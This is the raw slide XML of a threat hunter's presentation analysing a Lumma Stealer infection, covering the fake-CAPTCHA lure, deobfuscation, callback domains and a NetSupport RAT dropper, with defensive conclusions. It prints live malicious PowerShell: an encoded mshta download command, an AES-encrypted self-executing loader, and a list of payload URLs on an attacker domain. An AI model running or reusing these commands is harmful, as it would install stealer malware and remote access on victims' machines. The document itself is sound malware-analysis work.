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4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La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bold.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Raleway-regular.fntdata"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11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0.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Raleway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eb380e50e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eb380e50e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7f8777fc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7f8777fc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Powershell command -&gt; "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADEANAAiAA==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"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CeLutuP($RcZdrLqt){return -split ($RcZdrLqt -replace '..', '0x$&amp; ')};$RWleEqC = CeLutuP('B8E246EB6AC2743617A03CD92C23F503B43C0A21ADA7529CB60BAE6C47B3FF5C1CC14F4804855E4DDC9AE92F9B56052ED181C945F7C0C50E530DCC2FD6FDF02575E9592EB77BB76B3C7761AB8BA161067C33638B33B65F3A1FE47B16B6536BD7F3FAAB2DC2C10EEE14CA9A7C4EB72555570C22539E5B01A26E1B7C6E9E0C320993A4ABEEFE02367DC117E1C0F0A2C0706C7FF58AC26901D4A4118403C4748D51AC68481B48CF44CC76B61F46A65E1185D8A6DE50BBE7EC9A3B2C0D3056E118581F0454290D325B79F37DDC6C4429F8BEDB7F15416E0D3B4AEA3DAA9DC378D06196AA7CF2486C1ECCDE99F78F70B558398D66570D03E8D88A1A08536EDE0F4B46C8290BB114A3A01AB430A91CF73E3D8B7DD735AB895777279E9F41B3C095159C7ACC8A464DF47F9E5849F44D5E2C59077804A62B502BC078519934C8145FD09722A19DE7ADAF3F7DAB26F6AB43172E5D3DD750CF4980A1DE2DF0E37FAF40111ABBB6104F4AA406932D5CF8FA0A77B89F82DDD384B66F2B603565329305B763A42BCDE37AE587E315F14F58577E942797F19FDF63D9BDA415F7FC65D48DD0B5A67398FD87D7B0AA2C6C1BAD508A4A2159E4FD0992702BA36ABC945DA34BC5E49F12AEE5AC2C08CE464C010E40F84C463BFF9A5CFBBA6C6A9E1416A497B9C304C50B2BCD32CDA86CD07A6574D16CBA275A58052845E9306A706C68D5C6C8B4E5594D334EADC1BEE529F8EBF3C9C803CC31813F8249AC079020600A8B5B1F5E6681E5AAE8B43D2D55310F91C3EC7F6E3F51006FDCD52F9FEC0CF67C324615D360145BCFA155C337033AE8A0AB4B8D5D363CD76F17E556170902423520E6F1470848C3F052F8AD4D8074E6D89F1566802FBE1C3FB089C42C546B910AD639121A522719B0DEF95DCAB0D289B671FF95FD82FE4C5EA0B7A5B13FBCC9832ACAC865D99102298DB14AAEE4F8418A410863BEF22F8FA8FB8C9853D48615E46371FCB228939B0E7C6832265D7E88948283D331F869791E1A0644F34A9F3CEBC56FCACF1213CD8E7FF4459A0800CE77EB2FCE6F7CF838189987E1A654D7CF8E6120C0642E78D32043618A1A229EF060C0341D8E8907E01488C201BEC4095CBA841C15B17C7AD882B6B0CB1620320CA14E6C7E45979CC3C9AFD157A46DF7D94D5D2B9F1C5B19795177805CCC76F0FFAD7E0595A0EEE6E4A28B434623FDE79F2240188B4F90FA9F2627C27304412D644870C54BC0693FF833A62B501FD8FC65669A4715EA3877A96C5304DCEFAAA610916DBE55DE920DFF2AEDA48A4D3986E9BAA4EB1FF942BF3D2DAF9F8A4766BF78BFA574B5A890CA');$QwKzq = [System.Security.Cryptography.Aes]::Create();$QwKzq.Key = CeLutuP('446C7353755644576E71686E54494E5A');$QwKzq.IV = New-Object byte[] 16;$reQvGtfa = $QwKzq.CreateDecryptor();$kGlPdxpuA = $reQvGtfa.TransformFinalBlock($RWleEqC, 0, $RWleEqC.Length);$XGFyKkAPd = [System.Text.Encoding]::Utf8.GetString($kGlPdxpuA);$reQvGtfa.Dispose();&amp; $XGFyKkAPd.Substring(0,3) $XGFyKkAPd.Substring(3)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a8afa85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a8afa85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https://github.com/horsicq/Detect-It-Easy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option: Just open the file with text editor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:-D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a8afa854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1a8afa854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a8afa854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a8afa854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a8afa854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a8afa854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https://gchq.github.io/CyberChef/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a8afa854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1a8afa854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a8afa854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1a8afa854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 Studio =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://www.winitor.com/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a8afa854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a8afa854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https://www.virustotal.com/gui/search/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a8afa854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1a8afa854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https://any.run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https://app.any.run/tasks/661542dc-7a34-4448-a36c-2200c52f4083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C:\Users\lab\AppData\Roaming\CHM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a8afa854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1a8afa854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7f8777f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7f8777f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a8afa854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1a8afa854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https://github.com/hasherezade/mal_unpack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a8afa854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a8afa854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25">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/file/eb74d49d47423794cdc824b7ab5c557250441649aaedb09f8735c89f33fbf89c?nocache=1</a:t>
            </a:r>
            <a:endParaRPr sz="825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825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1a8afa854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1a8afa854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Note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https://steamcommunity.com/profiles/76561199724331900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https://github.com/mandiant/flare-floss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a8afa854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1a8afa854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Note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xlcdslw-ksfvzg.nzx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laaczgqzzc.nzx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laaczgpoyp.qfy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lnerctpgyj.qfy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tryzqtytdspft.tnf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bftlyetlu.tnf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otdxtddlyh.tnf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alnvlrpoyjm.njzf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gtwwlrporfj.njzf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zddjnctdet.njzf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a8afa8543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a8afa854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a8afa854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a8afa854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Note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https://update-ledger.net/update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a8afa854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1a8afa854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Note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$files = @{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'AudioCapture.dll' = 'https://update-ledger.net/ns/AudioCapture.dll'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'client32.exe' = 'https://update-ledger.net/ns/client32.exe'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'HTCTL32.DLL' = 'https://update-ledger.net/ns/HTCTL32.DLL'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'msvcr100.dll' = 'https://update-ledger.net/ns/msvcr100.dll'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'nskbfltr.inf' = 'https://update-ledger.net/ns/nskbfltr.inf'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'NSM.ini' = 'https://update-ledger.net/ns/NSM.ini'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'NSM.LIC' = 'https://update-ledger.net/ns/NSM.LIC'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'nsm_vpro.ini' = 'https://update-ledger.net/ns/nsm_vpro.ini'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'pcicapi.dll' = 'https://update-ledger.net/ns/pcicapi.dll'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'PCICHEK.DLL' = 'https://update-ledger.net/ns/PCICHEK.DLL'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'PCICL32.DLL' = 'https://update-ledger.net/ns/PCICL32.DLL'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'remcmdstub.exe' = 'https://update-ledger.net/ns/remcmdstub.exe'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'TCCTL32.DLL' = 'https://update-ledger.net/ns/TCCTL32.DLL'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https://update-ledger.net/info2.php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https://update-ledger.net/info3.php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a8afa854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1a8afa854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https://www.wikipedia.org/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a8afa854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1a8afa854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Note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largecustomerfriendlyshop.com:2080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https://www.broadcom.com/support/security-center/protection-bulletin/netsupport-rat-campaign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https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html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https://thehackernews.com/2023/11/netsupport-rat-infections-on-rise.html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1a8afa854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1a8afa854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7f8777fc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7f8777f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7f8777fc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7f8777fc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https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages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7f8777fc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7f8777fc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832166b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832166b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Note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Powershell command -&gt; "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADEANAAiAA==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7f8777fc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7f8777fc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https://github.com/JohnHammond/recaptcha-phish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a8afa8543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1a8afa854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Computer\HKEY_USERS\S-1-5-21-2853928292-886758879-2160759497-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU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a3b0513b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a3b0513b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2" name="Google Shape;10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9" name="Google Shape;109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0" name="Google Shape;12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2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8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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666075" y="744575"/>
            <a:ext cx="8166300" cy="14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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Investigating Lumma Stealer</a:t>
            </a:r>
            <a:endParaRPr sz="4200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill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754450" y="3548000"/>
            <a:ext cx="3492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</a:rPr>
              <a:t>Aung Myint Myat</a:t>
            </a:r>
            <a:endParaRPr sz="24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dig into the Malware</a:t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50" y="1469900"/>
            <a:ext cx="4324224" cy="3295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596" y="2097488"/>
            <a:ext cx="4610775" cy="20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tra14</a:t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75" y="1168775"/>
            <a:ext cx="3820975" cy="28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725" y="1481900"/>
            <a:ext cx="6200426" cy="36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Deobfuscation</a:t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00" y="1395250"/>
            <a:ext cx="4825926" cy="12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475" y="2432200"/>
            <a:ext cx="6487250" cy="205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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049875" y="1693375"/>
            <a:ext cx="18111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WScript.Echo(xxx)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Deobfuscation</a:t>
            </a:r>
            <a:endParaRPr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25" y="1224875"/>
            <a:ext cx="4368925" cy="21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5963" y="2256450"/>
            <a:ext cx="5738376" cy="24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 Deobfuscation</a:t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311700" y="1152475"/>
            <a:ext cx="228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AES encryption with given key and IV.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⇒ Time for the swiss army knife again</a:t>
            </a:r>
            <a:endParaRPr/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951" y="1055275"/>
            <a:ext cx="5524749" cy="387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4th Deobfuscation and finally </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>😩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/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025" y="1050100"/>
            <a:ext cx="535787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the zip</a:t>
            </a:r>
            <a:endParaRPr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25" y="1624799"/>
            <a:ext cx="3887176" cy="20854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3" name="Google Shape;2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3300" y="1345075"/>
            <a:ext cx="5846426" cy="3307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Sanity Checks</a:t>
            </a:r>
            <a:endParaRPr/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00" y="1124787"/>
            <a:ext cx="5513399" cy="3488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0" name="Google Shape;2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4025" y="2304400"/>
            <a:ext cx="7219950" cy="2609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Dynamic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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949" y="391400"/>
            <a:ext cx="2961150" cy="45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000" y="1132250"/>
            <a:ext cx="4333148" cy="303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9850" y="2090200"/>
            <a:ext cx="4394950" cy="2351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9" name="Google Shape;259;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203150" y="4617375"/>
            <a:ext cx="418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https://app.any.run/tasks/661542dc-7a34-4448-a36c-2200c52f4083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Connections</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="265" name="Google Shape;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050" y="1269300"/>
            <a:ext cx="6864875" cy="3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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258875" y="1436325"/>
            <a:ext cx="1486500" cy="30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More IOCs 😋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Profile</a:t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52475"/>
            <a:ext cx="733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Aung Myint Myat is currently working as a threat hunter at ExpressVPN in Singapore, focusing mainly on investigating security incidents, conducting proactive threat hunting, and developing robust defense mechanisms against threat actors.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Disclaimer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Opinions expressed are </a:t>
            </a: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solely my own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are not related to any of my  previous or present employers.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materials presented are based loosely on publicly available research and discoveries.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malware examples shown in this presentation are genuinely malicious and may pose serious security risks. Proceed with caution and at your own risk.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am not responsible for any damage or issues that may arise.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Dumping the malware process - SearchIndexer.exe</a:t>
            </a:r>
            <a:endParaRPr/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538" y="1276225"/>
            <a:ext cx="5895975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00" y="3139599"/>
            <a:ext cx="6441101" cy="16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Confirming Lumma</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Google Shape;279;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4141950"/>
            <a:ext cx="295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825"/>
              <a:t>https://www.virustotal.com/gui/file/eb74d49d47423794cdc824b7ab5c557250441649aaedb09f8735c89f33fbf89c?nocache=1</a:t>
            </a:r>
            <a:endParaRPr sz="825"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="280" name="Google Shape;2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450" y="380250"/>
            <a:ext cx="5683250" cy="438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Floss Output</a:t>
            </a:r>
            <a:endParaRPr/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00" y="1467849"/>
            <a:ext cx="8520601" cy="202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725" y="1150500"/>
            <a:ext cx="4324350" cy="3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687" y="1017725"/>
            <a:ext cx="7856625" cy="364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Steam Profile</a:t>
            </a:r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000" y="1178100"/>
            <a:ext cx="4151074" cy="35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474" y="1170125"/>
            <a:ext cx="3990127" cy="35932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Nice Trick </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>💡</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;30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it makes sense why we saw connections to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steamcommunity.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in dynamic analysis.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And the attacker can change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> domain name by updating steam profile.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="302" name="Google Shape;3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950" y="2571738"/>
            <a:ext cx="196215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last piece of puzzle</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;30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powershell was pulled from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rentry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SearchIndexer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>and dropped in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C:\Users\lab\AppData\Local\Temp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74" y="2168350"/>
            <a:ext cx="7143675" cy="21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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="261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Executed Script </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;31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IOCs again.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But NetManager?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="Google Shape;3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250" y="82650"/>
            <a:ext cx="6127752" cy="497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49" y="1556674"/>
            <a:ext cx="6156475" cy="30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NetSupport Manager as RAT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="323" name="Google Shape;32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225" y="1017725"/>
            <a:ext cx="2863300" cy="39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7750" y="1172025"/>
            <a:ext cx="6408500" cy="3649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 Server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="330" name="Google Shape;3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75" y="1261100"/>
            <a:ext cx="5210212" cy="370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0200" y="1138800"/>
            <a:ext cx="5719724" cy="2137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2" name="Google Shape;33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4871" y="2571750"/>
            <a:ext cx="4104301" cy="2529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3" name="Google Shape;33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5550" y="2506612"/>
            <a:ext cx="6916126" cy="1917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39" name="Google Shape;33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attack chain is sophisticated enough performing multiple operations from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tricking users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>to run the command, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obfuscating the code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> multiple layers to avoid detection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dll injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> of legitimate process, using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic callback domains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> with steam profile, leaving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAT with NetSupport Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. 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 effectively prevent and minimize the impact of such advanced malware threats, organizations must develop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>robust detection and hunting mechanisms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, enhance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user security awareness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, establish efficient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>communication channels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, and implement mature incident response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(IR) workflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to maintain strong cyber defenses.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Introduction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Lumma Stealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, an advanced information-stealing malware operating within a malware-as-a-service (MaaS) framework.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is designed to exfiltrate sensitive information such as passwords, session tokens, cryptocurrency wallets, and other personal data from infected machines..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As of late August 2024, the malware is being distributed through deceptive human verification pages that trick users into running malicious PowerShell commands.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Malware-As-A-Service</a:t>
            </a:r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8025"/>
            <a:ext cx="5528624" cy="307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" name="Google Shape;151;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421800" y="2876500"/>
            <a:ext cx="24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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6545550" y="1813625"/>
            <a:ext cx="2163000" cy="1902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Lumma Stealer service plans available in underground forums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687" y="1074275"/>
            <a:ext cx="5678626" cy="38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Fine Morning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2373262" y="2028263"/>
            <a:ext cx="4397476" cy="1521275"/>
            <a:chOff x="4571988" y="1647413"/>
            <a:chExt cx="4397476" cy="1521275"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="160" name="Google Shape;160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1988" y="1647413"/>
              <a:ext cx="4397476" cy="152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29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5397813" y="1898350"/>
              <a:ext cx="3192300" cy="1019400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E0DE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Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>New message in #security-alerts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Malicious Software detected affecting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xxx device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2" name="Google Shape;16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7313" y="0"/>
            <a:ext cx="6429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The Alert</a:t>
            </a:r>
            <a:endParaRPr sz="2500"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275" y="3503638"/>
            <a:ext cx="638350" cy="7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900" y="1431925"/>
            <a:ext cx="4934625" cy="3153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1825" y="1257462"/>
            <a:ext cx="4690476" cy="1795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use of Fake Captcha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did user fall into the trap?</a:t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29000"/>
            <a:ext cx="8520601" cy="2321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3575" y="1329846"/>
            <a:ext cx="4274750" cy="3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Verifying if the user actually got tricked</a:t>
            </a:r>
            <a:endParaRPr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54725"/>
            <a:ext cx="5319749" cy="1791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449" y="2339875"/>
            <a:ext cx="3207751" cy="2405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Tricks</a:t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50" y="1226500"/>
            <a:ext cx="3597075" cy="2940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" name="Google Shape;1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350" y="639950"/>
            <a:ext cx="3820250" cy="380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113" y="2430350"/>
            <a:ext cx="4410075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8275" y="1843363"/>
            <a:ext cx="440055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